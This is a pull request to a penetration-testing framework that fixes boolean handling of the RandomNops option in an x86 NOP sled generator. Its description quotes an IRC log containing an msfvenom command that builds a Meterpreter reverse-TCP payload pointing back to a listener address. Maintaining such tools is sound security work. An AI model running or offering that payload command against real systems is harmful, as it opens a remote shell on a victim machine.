### PR TITLE
Fix ghetto true/false checking in NOP generator

### DIFF
--- a/modules/nops/x86/single_byte.rb
+++ b/modules/nops/x86/single_byte.rb
@@ -106,7 +106,7 @@ SINGLE_BYTE_SLED =
 
     # Did someone specify random NOPs in the environment?
     if (!random and datastore['RandomNops'])
-      random = (datastore['RandomNops'].match(/true|1|y/i) != nil)
+      random = datastore['RandomNops']
     end
 
     # Generate the whole sled...


### PR DESCRIPTION
Missed in #6644.

```
17:06 < nullsign> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.43 LPORT=80 -i1 -n3 --bad-chars '\u0000\u00ff' --platform win -f js_le
17:09 <@wvu> Error: undefined method `match' for true:TrueClass
```
